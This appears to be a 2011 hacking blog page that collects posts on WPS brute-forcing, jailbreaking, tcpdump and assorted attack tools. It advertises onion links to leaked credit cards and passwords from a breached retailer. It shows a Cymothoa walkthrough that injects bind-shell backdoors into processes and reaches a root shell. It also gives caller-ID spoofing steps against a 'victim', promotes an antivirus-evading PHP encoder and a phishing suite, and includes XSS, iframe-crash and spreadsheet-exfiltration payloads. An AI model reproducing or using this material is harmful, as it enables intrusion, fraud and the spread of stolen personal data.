Dec 30, 2011

Most Wi-Fi routers susceptible to hacking through security feature

Stefan Viehböck, an independent security researcher, published a paper on Boxing Day titled "Brute forcing Wi-Fi Protected Setup" to his WordPress blog disclosing a weakness in the configuration of most consumer/SoHo Wi-Fi routers.
As we all know the state of security for most home Wi-Fi networks was nearly non-existent only a few years ago.
This prompted the Wi-Fi Alliance to establish a new simple method for consumers to enable and configure WPA2 on their routers without knowledge of encryption, keys or how it all works.
The standard is called Wi-Fi Protected Setup (WPS) and is enabled by default on nearly all consumer Wi-Fi access points, including those sold by Cisco/Linksys, Netgear, Belkin, Buffalo, D-Link and Netgear.
It has three methods of simplifying the connection of wireless devices to WPA2 protected access points:
  1. Push Button Connect (PBC) requires the user to push a button on the router which allows it to communicate with a client needing configuration. The client attempts to connect and the router simply sends it the security configuration required to communicate.
  2. Client PIN mode is where the client device supports WPS and has a PIN assigned by the manufacturer. You then login to the router's management interface and enter the PIN to authorize that client to obtain the encryption configuration.
  3. Router PIN mode allows a client to connect by entering a secret PIN from a label on the router, or from its management interface which authorizes the client to obtain the security configuration details.
The first method requires physical access, while the second requires administrative access, both of these pass muster. The third however, can be accomplished only through the use of the Wi-Fi radio.
The PIN used for authentication is only eight digits which would give the appearance of 108 (100,000,000) possibilities. It turns out the last digit is just a checksum, which takes us down to 107 (10,000,000) combinations.
Worse yet the protocol is designed where the first half and second half are sent separately and the protocol will confirm if only one half is correct.
So you have now reduced the difficulty of brute forcing the PIN down to 104 (10,000) plus 103 (1,000) or 11,000 possibilities.
Some of the routers Viehböck tested did seem to implement a mechanism to slow down the brute forcing, but the worst case scenario allowed him to acquire the keys within 44 hours.
Compared with attempting to attack WPA2-PSK directly, this is a cheap and effective attack.
As the sub-title of Viehböck's paper states "When poor design meets poor implementation" security is the loser.
If you own a reasonably modern Wi-Fi router you are at risk (unless you have installed some sort of alternative firmware like OpenWRT or Tomato Router).
If possible disable the WPS support on your router and contact your manufacturer for updated firmware which may provide a fix or mitigation against this attack.
Another researcher independently discovered the same issue and has published a tool called Reaver that implements this attack.
Similar to the Firesheep tool, this will likely light a fire under the butts of the Wi-Fi Alliance and manufacturers to quickly resolve these issues.

If you like my blog, Please Donate Me

Ultimate Encoder - PHP Encoder with multiple compression by lionaneesh

Ultimate Encoder" - Another Online tool by lionaneesh, an Indian developer and Hacker. Its a PHP Encoder with multiple compression. A Piece of code can be encoded multiple times making it impossible for any Anti Virus to detect it


If you like my blog, Please Donate Me

Dec 28, 2011 was hacked!!!

If you want the detail, please go to the Source

http://ibhg35kgdvnb7jvw.onion//lulzxmas/specialforces_full.txt.gz  <- orders/addresses/ccs
http://ibhg35kgdvnb7jvw.onion//lulzxmas/specialforces_passwords.txt  <- just the passwords    <- both combined
# grep -R -H -i '.mil' specialforces_passwords.txt | wc
    1274    8072  127545
# grep -R -H -i '.gov' specialforces_passwords.txt | wc
     159    1064   15720
# ls -al /home/
total 64
drwxr-xr-x 15 root              root              4096 Nov 19  2009 .
drwxr-xr-x 24 root              root              4096 Mar 30 04:15 ..
drwxr-xr-x 10 ambientgraphic    ambientgraphic    4096 Aug 11 10:37 ambientgraphic
drwxr-xr-x  4 ambientscan       ambientscan       4096 Feb 27  2009 ambientscan
drwxrwxrwx 30 client            client            8192 Aug 12 03:46 client
drwxr-xr-x 11 cliffdigital      cliffdigital      4096 Aug 11 14:11 cliffdigital
drwxr-xr-x  8 mywallbuddy       mywallbuddy       4096 Jul 28 14:49 mywallbuddy
drwx------  2 nathan            nathan            4096 Sep 12  2008 nathan
drwxrwxrwx  3 nobody            nobody            4096 Oct  3  2008 nobody
drwxr-xr-x  7 nosurrender       nosurrender       4096 Feb 23  2010 nosurrender
drwxr-xr-x  4 ridgewoodapts     ridgewoodapts     4096 Apr  9  2008 ridgewoodapts
drwxr-xr-x  4 scan              scan              4096 Oct 13  2008 scan
dr-xr-xr-x 23 specialforces     specialforces     4096 Aug 11 18:40 specialforces
drwxr-xr-x  4 specialforcesgear specialforcesgear 4096 Feb 26  2008 specialforcesgear
lrwxrwxrwx  1 root              root                13 Nov 19  2009 upload -> /home/client/
drwx------  3 upload            upload            4096 Nov 19  2009 upload-bak
# cat /etc/shadow

If you like my blog, Please Donate Me

Howto: Jailbreak 5.0.1 Untethered - iPhone 4, 3GS, iPod Touch 4G, 3G, iPad with Redsn0w 0.9.10 b1

If you want to download any program for this tutorial, please go to the Source.

Step by Step guide :

Step 1: Connect your iDevice with your PC via USB, and open iTunes then Restore to iOS 5.0.1 (If you are already running iOS 5.0.1, bypass this step)

Step 2: Start Redsn0w 0.9.10 b1, and press on "Jailbreak" button

Step 3: Now select “Install Cydia” and click “Next”.
Step 4: Now make sure your device is both OFF and PLUGGED IN to the computer before you click “Next”.

At this stage you will be presented with a screen where you will be guided on how to enter DFU mode. Quickly hold “Power” button and then while holding the “Power” button, you will now have to hold “Home” button too. Now after few seconds release “Power” button but keep holding “Home” button until installation begins.

Strep 5:
Wait until you get iOS 5.0.1  untethered jailbroken in few minutes. Congratulations.


If you like my blog, Please Donate Me

Dec 27, 2011

Bluelog: Bluetooth Scanner Tool

Bluelog is a Bluetooth scanner/logger written with speed in mind. It is intended to be used as a site survey tool, concerned more about accurately detecting the number of discoverable Bluetooth devices than individual device specifics. Bluelog also includes the unique "Bluelog Live" mode, which puts discovered devices into a constantly updating live webpage which you can serve up with your HTTP daemon of choice



If you like my blog, Please Donate Me

Dec 24, 2011

inject backdoor’s shellcode into an existing process – Cymothoa

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.
root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (
5 - script execution (requires -i -c), creates a tmp file in the process dir you must remove
6 - forks an HTTP Server on port tcp/8800 -
7 - serial port busybox binding -
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) -
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (
find /bin/bash pid
root@Dis9Team:/pentest/backdoors/cymothoa# ps aux | grep /bin/bash
root      1236  0.0  0.2   4280  1376 tty1     S+   09:22   0:00 /bin/bash /usr/bin/startx
root      1506  0.1  0.3   4648  1932 pts/1    S    09:22   0:00 /bin/bash
root      1554  0.0  0.1   3376   744 pts/1    S+   09:26   0:00 grep --color=auto /bin/bash

pid = 1506
root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa  -p 1506 -s 0 -y 10086
[+] attaching to process 1506

 register info:
 eax value: 0xfffffe00  ebx value: 0xffffffff
 esp value: 0xbf940ae4  eip value: 0xb7818422

[+] new esp: 0xbf940ae0
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1506

[+] infected!!!

-s = 0 Payloads = 0 – bind /bin/sh to the provided port (requires -y)
root@Dis9Team:/pentest/backdoors/cymothoa# nmap -p 10086

Starting Nmap 5.59BETA1 ( ) at 2011-12-23 09:29 CST
Nmap scan report for localhost (
Host is up (0.00062s latency).
10086/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

root@Dis9Team:/pentest/backdoors/cymothoa# nc 10086
uid=0(root) gid=0(root) groups=0(root)

next Payloads = 2 – bind /bin/sh to tcp port with password authentication (requires -y -o)
root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1 -s 2 -y 1002 -o 123456
[+] attaching to process 1

 register info:
 eax value: 0xfffffdfe  ebx value: 0xa
 esp value: 0xbfc0240c  eip value: 0xb7856422

[+] new esp: 0xbfc02408
[+] injecting code into 0xb7857000
[+] copy general purpose registers
[+] detaching from 1

[+] infected!!!
root@Dis9Team:/pentest/backdoors/cymothoa# nc 1002
Password: 123456

If you like my blog, Please Donate Me

Call Spoofing

Steps to Do Spoofed Call :
1.) Open and Select Country where you want to call.
2.) Enter Number A = The Fake number you want to Display to Victim
3.) Enter Number B = Victim's Number
4.) Now Click "Get me a Code" . Done !
5.) On right side of page you will get A mobile number + Five Digit Unique Code.
6.) Now do a call from another number (say Number C) on Given number in Step 5.
7.) It will ask you to Enter the Code, that you get in Step 5.
8.) Done ! The Victim with Number B will Get a Call from Fake number A, Even you are using Number C for calling.

If you like my blog, Please Donate Me

Dec 21, 2011

Excel formula injection in Google Docs

One day we needed to conduct a small survey, and we decided to use Google Docs as platform for the survey.
There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and tests forms.

After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey.
This is how the form looks for a participant:

And this is how the author sees the participant's answers:

I suppose that any web researcher upon seeing a form instinctively puts ‘,",> and other interesting symbols here?
We tried it, too. However, everything was encoded and filtered exactly as planned.
Well… But all of user input is inserted into an Excel table, so why don't we try to inject some formula?
Excel formulas start with an “=”.
OK, let’s give it a try.

Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell.
So how do we get rid of the space? Easy as pie: use backspace :)
%08 is the Hex code of the backspace key.

Thus, we wrote in the entry field:


The formula got inserted into the table just fine.
All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here.

With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell.

That gave us the following attack vector:
1) Put sensitive user data into A1 cell (or probably they are already there)
2) Put a formula which makes GET request to into Z666 cell.
3) Read web server logs, get data from cells.
4) Profit!

Soon after describing the bug and the possible attack vector we got the following letter:

And a bit later we saw our names in Google Hall of Fame

Finally, a little Google Hack ;)


If you like my blog, Please Donate Me

ghost-phisher - GUI suite for phishing and penetration attacks

Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server, Fake HTTP server and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as an honey pot , could be used to service DHCP request , DNS requests or phishing attacks
New Version 1.3
Ghost Phisher 1.3 includes the following new features
1. Update Algorithm
2. Penetration (Metasploit Binding)
3. Support for cloning HTTPS
4. Smarter Algorithm for HTTP Servers
5. Smarter HTML parsing
6. DHCP restructure and verbosity
7. Resolution adjustment for Netbook Users (F3 button)
8. User interface adjustments
9. Automatic redirections after payload download
10.Custom payload and generic vulnerability page supports
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
root@host:~# dpkg -i ghost-phisher_1.3_all.deb
Icons and Running the application:
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Ghost Phisher.desktop"
To get the source code for this project from SVN, here's the checkout link:
root@host:~# svn checkout


If you like my blog, Please Donate Me

Confirmed: #XSS in #Tweetdeck reading #Facebook feeds to Web client

Following on from the discovery and the previous posting, see below; original content is in my feed somewhere but looks like:
<iMg Src=http://localhost/nope.gif onerror='javascript:alert("happy now ben?")'>

Twitter have had XSS bugs before, not Tweetdeck as far as I am aware – but then they used to have a proper client as opposed to a web interface.
Graham Cluley will doubtless be along shortly to tell us how [insert product name here] can protect us from all the stupid things that programmers do and fix only once.



If you like my blog, Please Donate Me

Apple Safari used to exploit zero-day security hole in Windows 7

The vulnerability lets hackers inject malicious code on victim PCs through overly large Web page iFrames

Security company Secunia today announced a highly critical zero-day vulnerability affecting Windows 7, exploitable via Apple's Safari browser, of all things. Secunia confirmed that the vulnerability affects fully patched Windows 7 Professional 64-bit and cautioned that other versions may be affected.
The remotely exploitable vulnerability, caused by an error in win32k.sys, enables a hacker to run arbitrary code -- such as malware -- on a victim's machine when he or she visits a specially crafted Web page using Safari. Specifically, the Web page would simply need to contain an iFrame -- an HTML element that is typically used to pull content from other sources onto a Web page -- with an overly large "height" attribute.
The vulnerability was first made public via Twitter user "w3bd3vil," who tweeted on Sunday, "<iframe height='18082563'></iframe> causes a BSoD [blue screen of death] on win 7 x64 via Safari. Lol!"
If there's a silver lining here, it's that most Windows users don't use Safari for Web browsing: It has a 5 percent market share among all browsers Windows desktops, according to NetMarketshare. (Opera has 1.55 percent, Chrome has 18 percent, Firefox has 22 percent, and Internet Explorer has 56 percent.)
However, as noted by Kaspersky Labs' threatpost blog, it's possible that other browsers could be used to exploit the vulnerability as well.


If you like my blog, Please Donate Me

Dec 20, 2011

Master to tcpdump

tcpdump fu

Packet capture is one of the most fundamental and powerful ways to do network analysis. You can learn virtually anything about what is going on within a network by intercepting and examining the raw data that crosses it. Modern network analysis tools are able to capture, interpret and describe this network traffic in a human-friendly manner.
tcpdump is one of the original packet capture (or "sniffing") tools that provide these analysis capabilities, and even though it now shares the field with many other utilities, it remains one of the most powerful and flexible.
If you think that tcpdump has been made obsolete by GUI tools like Wireshark, think again. Wireshark is a great application; it's just not the right tool for the job in every situation. As a refined, universal, lightweight command-line utility—much like cat, less and hexdump—tcpdump satisfies a different type of need.
One of tcpdump's greatest strengths is its convenience. It uses a "one-off-command" approach that lends itself to quick, on-the-spot answers. It works through an SSH session, doesn't need X and is more likely to be there when you need it. And, because it uses standard command-line conventions (such as writing to STDOUT, which can be redirected), tcpdump can be used in all sorts of creative, interesting and extremely useful ways.
In this article, I introduce some of the basics of packet capture and provide a breakdown of tcpdump syntax and usage. I show how to use tcpdump to zero in on specific packets and reveal the useful information they contain. I provide some real-world examples of how tcpdump can help put the details of what's happening on your network at your fingertips, and why tcpdump is still a must-have in any admin's toolbox.

Essential Concepts

Before you can begin to master tcpdump, you should understand some of the fundamentals that apply to using all packet sniffers:
·         Packet capturing is passive—it doesn't transmit or alter network traffic.
·         You can capture only the packets that your system receives. On a typical switched network, that excludes unicast traffic between other hosts (packets not sent to or from your machine).
·         You can capture only packets addressed to your system, unless the network interface is in promiscuous mode.
It is assumed that you're interested in seeing more than just your local traffic, so tcpdump turns on promiscuous mode automatically (which requires root privileges). But, in order for your network card to receive the packets in the first place, you still have to be where the traffic is, so to speak.

Anatomy of a tcpdump Command

A tcpdump command consists of two parts: a set of options followed by a filter expression (Figure 1).

Figure 1. Example tcpdump Command
The expression identifies which packets to capture, and the options define, in part, how those packets are displayed as well as other aspects of program behavior.


tcpdump options follow the standard command-line flag/switch syntax conventions. Some flags accept a parameter, such as -i to specify the capture interface, while others are standalone switches and can be clustered, such as -v to increase verbosity and -n to turn off name resolution.
The man page for tcpdump lists all available options, but here are a few of the noteworthy ones:
·         -i interface: interface to listen on.
·         -v, -vv, -vvv: more verbose.
·         -q: less verbose.
·         -e: print link-level (Ethernet) headers.
·         -N: display relative hostnames.
·         -t: don't print timestamps.
·         -n: disable name lookups.
·         -s0 (or -s 0): use the max "snaplen"—capture full packets (default in recent versions of tcpdump).
None of these are required. User-supplied options simply modify the default program behavior, which is to capture from the first interface, and then print descriptions of matching packets on the screen in a single-line format.

Filter Expression

The filter expression is the Boolean (true or false) criteria for "matching" packets. All packets that do not match the expression are ignored.
The filter expression syntax is robust and flexible. It consists primarily of keywords called primitives, which represent various packet-matching qualifiers, such as protocol, address, port and direction. These can be chained together with and/or, grouped and nested with parentheses, and negated with not to achieve virtually any criteria.
Because the primitives have friendly names and do a lot of the heavy lifting, filter expressions are generally self-explanatory and easy to read and construct. The syntax is fully described in the pcap-filter man page, but here are a few example filter expressions:
·         tcp
·         port 25 and not host
·         icmp or arp or udp
·         vlan 3 and ether src host aa:bb:cc:dd:ee:ff
·         arp or udp port 53
·         icmp and \(dst host mrorange or dst host mrbrown\)
Like the options, filter expressions are not required. An empty filter expression simply matches all packets.

Understanding tcpdump Output

How much sense the output makes depends on how well you understand the protocols in question. tcpdump tailors its output to match the protocol(s) of the given packet.
For example, ARP packets are displayed like this when tcpdump is called with -t and -n (timestamps and name lookups turned off):
arp who-has tell
arp reply is-at 00:01:02:03:04:05
ARP is a simple protocol used to resolve IPs into MAC addresses. As you can see above, tcpdump describes these packets in a correspondingly simple format. DNS packets, on the other hand, are displayed completely different:
IP > 19+ A? (34)
IP > 19 1/0/0 A (50)
This may seem cryptic at first, but it makes more sense when you understand how protocol layers work. DNS is a more complicated protocol than ARP to begin with, but it also operates on a higher layer. This means it runs over top of other lower-level protocols, which also are displayed in the output.
Unlike ARP, which is a non-routable, layer-3 protocol, DNS is an Internet-wide protocol. It relies on UDP and IP to carry and route it across the Internet, which makes it a layer-5 protocol (UDP is layer-4, and IP is layer-3).
The underlying UDP/IP information, consisting of the source and destination IP/port, is displayed on the left side of the colon, followed by the remaining DNS-specific information on the right.
Even though this DNS information still is displayed in a highly condensed format, you should be able to recognize the essential elements if you know the basics of DNS. The first packet is a query for, and the second packet is an answer, giving the address These are the kind of packets that are generated from simple DNS lookups.
See the "OUTPUT FORMAT" section of the tcpdump man page for complete descriptions of all the supported protocol-specific output formats. Some protocols are better served than others by their output format, but I've found that tcpdump does a pretty good job in general of showing the most useful information about a given protocol.

Capture Files

In addition to its normal behavior of printing packet descriptions to the screen, tcpdump also supports a mode of operation where it writes packets to a file instead. This mode is activated when the -w option is used to specify an output capture file.
When writing to a file, tcpdump uses a completely different format from when it writes to the screen. When writing to the screen, formatted text descriptions of packets are printed. When writing to a file, the raw packets are recorded as is, without analysis.
Instead of doing a live capture, tcpdump also can read from an existing capture file as input with the -r option. Because tcpdump capture files use the universally supported "pcap" format, they also can be opened by other applications, including Wireshark.
This gives you the option to capture packets with tcpdump on one host, but perform analysis on a different host by transferring and loading the capture file. This lets you use Wireshark on your local workstation without having to attach it to the network and location you need to capture from.

Analyzing TCP-Based Application Protocols

tcpdump is a packet-based analyzer, and it works great for connectionless, packet-based protocols like IP, UDP, DHCP, DNS and ICMP. However, it cannot directly analyze "connection-oriented" protocols, such as HTTP, SMTP and IMAP, because they work completely different.
They do not have the concept of "packets". Instead, they operate over the stream-based connections of TCP, which provide an abstracted communications layer. These application protocols are really more like interactive console programs than packet-based network protocols.
TCP transparently handles all of the underlying details required to provide these reliable, end-to-end, session-style connections. This includes encapsulating the stream-based data into packets (called segments) that can be sent across the network. All of these details are hidden below the application layer.
In order to capture TCP-based application protocols, an extra step is needed beyond capturing packets. Because each TCP segment is only a slice of application data, it can't be used individually to obtain any meaningful information. You first must reassemble TCP sessions (or flows) from the combined sets of individual segments/packets. The application protocol data is contained directly within the sessions.
tcpdump doesn't have an option to assemble TCP sessions from packets directly, but you can "fake" it by using what I call "the tcpdump strings trick".

The tcpdump Strings Trick

Usually when I'm capturing traffic, it's just for the purpose of casual analysis. The data doesn't need to be perfect if it shows me what I'm looking for and helps me gain some insight.
In these cases, speed and convenience reign supreme. The following trick is along these lines and is one of my favorite tcpdump techniques. It works because:
1.      TCP segments usually are sent in chronological order.
2.      Text-based application protocols produce TCP segments with text payloads.
3.      The data surrounding the text payloads, such as packet headers, is usually not text.
4.      The UNIX command strings filters out binary data from streams preserving only text (printable characters).
5.      When tcpdump is called with -w - it prints raw packets to STDOUT.
Put it all together, and you get a command that dumps real-time HTTP session data:
tcpdump -l -s0 -w - tcp dst port 80 | strings
The -l option above turns on line buffering, which makes sure data gets printed to the screen right away.
What is happening here is tcpdump is printing the raw, binary data to the screen. This uses a twist on the -w option where the special filename - writes to STDOUT instead of a file. Normally, doing this would display all kinds of gibberish, but that's where the strings command comes in—it allows only data recognized as text through to the screen.
There are few caveats to be aware of. First, data from multiple sessions received simultaneously is displayed simultaneously, clobbering your output. The more refined you make the filter expression, the less of a problem this will be. You also should run separate commands (in separate shells) for the client and server side of a session:
tcpdump -l -s0 -w - tcp dst port 80 | strings
tcpdump -l -s0 -w - tcp src port 80 | strings
Also, you should expect to see a few gibberish characters here and there whenever a sequence of binary data also happens to look like text characters. You can cut down on this by increasing min-len (see the strings man page).
This trick works just as well for other text-based protocols.

HTTP and SMTP Analysis

Using the strings trick in the previous section, you can capture HTTP data even though tcpdump doesn't actually understand anything about it. You then can "analyze" it further in any number of ways.
If you wanted to see all the Web sites being accessed by "davepc" in real time, for example, you could run this command on the firewall (assume the internal interface is eth1):
tcpdump -i eth1 -l -s0 -w - host davepc and port 80 \
  | strings | grep 'GET\|Host'
In this example, I'm using a simple grep command to display only lines with GET or Host. These strings show up in HTTP requests and together show the URLs being accessed.
This works just as well for SMTP. You could run this on your mail server to watch e-mail senders and recipients:
tcpdump -l -s0 -w - tcp dst port 25 | strings \
  | grep -i 'MAIL FROM\|RCPT TO'
These are just a few silly examples to illustrate what's possible. You obviously could take it beyond grep. You could go as far as to write a Perl script to do all sorts of sophisticated things. You probably wouldn't take that too far, however, because at that point, there are better tools that actually are designed to do that sort of thing.
The real value of tcpdump is the ability to do these kinds of things interactively and on a whim. It's the power to look inside any aspect of your network whenever you want without a lot of effort.

Debugging Routes and VPN Links

tcpdump is really handy when debugging VPNs and other network connections by showing where packets are showing up and where they aren't. Let's say you've set up a standard routable network-to-network VPN between and (Figure 2).
Figure 2. Example VPN Topology
If it's operating properly, hosts from either network should be able to ping one another. However, if you are not getting replies when pinging host D from host A, for instance, you can use tcpdump to zero in on exactly where the breakdown is occurring:
tcpdump -tn icmp and host
In this example, during a ping from to, each round trip should show up as a pair of packets like the following, regardless of from which of the four systems the tcpdump command is run:
IP > ICMP echo request, 
 id 46687, seq 1, length 64
IP > ICMP echo reply, 
 id 46687, seq 1, length 64
If the request packets make it to host C (the remote gateway) but not to D, this indicates that the VPN itself is working, but there could be a routing problem. If host D receives the request but doesn't generate a reply, it probably has ICMP blocked. If it does generate a reply but it doesn't make it back to C, then D might not have the right gateway configured to get back to
Using tcpdump, you can follow the ping through all eight possible points of failure as it makes its way across the network and back again.


I hope this article has piqued your interest in tcpdump and given you some new ideas. Hopefully, you also enjoyed the examples that barely scratch the surface of what's possible.
Besides its many built-in features and options, as I showed in several examples, tcpdump can be used as a packet-data conduit by piping into other commands to expand the possibilities further—even if you do manage to exhaust its extensive "advertised" capabilities. The ways to use tcpdump are limited only by your imagination.
tcpdump also is an incredible learning tool. There is no better way to learn how networks and protocols work than from watching their actual packets.
Don't forget to check out the tcpdump and pcap-filter man pages for additional details and information.

The tcpdump/libpcap Legacy

tcpdump has been the de facto packet capture tool for the past 25 years. It really did spawn the whole genre of network utilities based on sniffing and analyzing packets. Prior to tcpdump, packet capture had such high processing demands that it was largely impractical. tcpdump introduced some key innovations and optimizations that helped make packet capture more viable, both for regular systems and for networks with a lot of traffic.
The utilities that came along afterward not only followed tcpdump's lead, but also directly incorporated its packet capture functionality. This was possible because very early on, tcpdump's authors decided to move the packet capture code into a separate portable library called libpcap.
Wireshark, ntop, snort, iftop, ngrep and hundreds of other applications and utilities available today are all based on libpcap. Even most packet capture applications for Windows are based on a port of libpcap called WinPcap.


tcpdump and libpcap:
TCP/IP Model:


If you like my blog, Please Donate Me